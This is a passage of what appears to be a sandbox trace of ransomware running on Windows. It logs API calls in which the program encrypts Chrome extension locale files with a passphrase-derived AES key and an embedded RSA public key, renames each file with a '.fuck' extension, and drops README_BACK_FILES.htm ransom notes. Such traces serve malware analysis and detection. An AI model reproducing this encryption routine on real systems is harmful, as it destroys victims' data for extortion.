Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json")) returned 0x20 [0249.164] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json", dwFileAttributes=0x80) returned 1 [0249.164] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.164] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.165] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.166] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.168] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.168] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.168] CryptHashData (hHash=0x2938978, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.168] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.168] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.168] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.168] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293ef70) returned 1 [0249.169] CryptImportPublicKeyInfo (in: hCryptProv=0x293ef70, dwCertEncodingType=0x1, pInfo=0x2930cc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930cf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930cf8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937a78) returned 1 [0249.169] CryptEncrypt (in: hKey=0x2937a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.169] CryptEncrypt (in: hKey=0x2937a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293ebb8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293ebb8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.169] WriteFile (in: hFile=0x5d58, lpBuffer=0x293ebb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293ebb8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.170] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdb, lpOverlapped=0x0) returned 1 [0249.171] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdb, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.171] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.171] CloseHandle (hObject=0x5d5c) returned 1 [0249.171] CloseHandle (hObject=0x5d58) returned 1 [0249.171] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), bFailIfExists=0) returned 1 [0249.174] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json", dwFileAttributes=0x0) returned 1 [0249.174] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.gsg")) returned 1 [0249.175] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.fuck")) returned 1 [0249.176] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.176] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.176] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.176] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.176] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.176] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\readme_back_files.htm")) returned 0xffffffff [0249.176] AreFileApisANSI () returned 1 [0249.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3508, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0249.176] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.177] GetFileType (hFile=0x5d54) returned 0x1 [0249.177] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.178] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.178] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.178] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.178] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.178] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.178] GetLastError () returned 0x0 [0249.179] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json")) returned 0x20 [0249.179] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json", dwFileAttributes=0x80) returned 1 [0249.180] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.180] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.180] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.181] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.183] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.183] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.183] CryptHashData (hHash=0x2938978, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.183] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937678) returned 1 [0249.183] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.183] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.183] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293f080) returned 1 [0249.183] CryptImportPublicKeyInfo (in: hCryptProv=0x293f080, dwCertEncodingType=0x1, pInfo=0x2931000*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931030*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931038*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29378b8) returned 1 [0249.183] CryptEncrypt (in: hKey=0x29378b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.183] CryptEncrypt (in: hKey=0x29378b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293ea20*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293ea20*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.184] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293ea20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293ea20*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.184] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd7, lpOverlapped=0x0) returned 1 [0249.185] CryptEncrypt (in: hKey=0x2937678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd7, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.185] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.186] CloseHandle (hObject=0x5d58) returned 1 [0249.186] CloseHandle (hObject=0x5d5c) returned 1 [0249.186] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), bFailIfExists=0) returned 1 [0249.188] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json", dwFileAttributes=0x0) returned 1 [0249.189] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.gsg")) returned 1 [0249.189] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.fuck")) returned 1 [0249.190] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.190] CryptDestroyKey (hKey=0x2937678) returned 1 [0249.190] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.190] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.190] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.191] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\readme_back_files.htm")) returned 0xffffffff [0249.191] AreFileApisANSI () returned 1 [0249.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.191] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.191] GetFileType (hFile=0x5d54) returned 0x1 [0249.191] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.192] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.192] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.193] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.193] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.193] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.193] GetLastError () returned 0x0 [0249.193] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json")) returned 0x20 [0249.193] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json", dwFileAttributes=0x80) returned 1 [0249.194] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.194] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.195] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.195] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.197] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.197] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.197] CryptHashData (hHash=0x2938978, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.197] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29374f8) returned 1 [0249.197] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.197] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.197] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293e338) returned 1 [0249.198] CryptImportPublicKeyInfo (in: hCryptProv=0x293e338, dwCertEncodingType=0x1, pInfo=0x2932040*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932070*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932078*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29376b8) returned 1 [0249.198] CryptEncrypt (in: hKey=0x29376b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 